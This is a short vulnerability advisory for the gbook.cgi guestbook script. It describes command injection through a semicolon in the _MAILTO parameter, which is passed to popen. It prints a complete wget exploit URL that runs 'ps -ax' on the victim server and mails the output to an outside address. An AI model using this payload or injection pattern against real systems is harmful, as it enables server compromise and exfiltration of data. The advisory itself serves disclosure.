COMMAND

    gbook.cgi

SYSTEMS AFFECTED

    gbook.cgi

PROBLEM

    JW Oh found following.  gbook.cgi  is used by some web sites.   We
    can set  _MAILTO parameter,  and popen  is called  to execute mail
    command.   If ';'  is used  in _MAILTO  variable, you  can execute
    arbitrary command with it.  It's so trivial.

    This exploit  executes "ps  -ax" command  and sends  the result to
    haha@yaho.com.

        wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"

SOLUTION

    It's fixed now...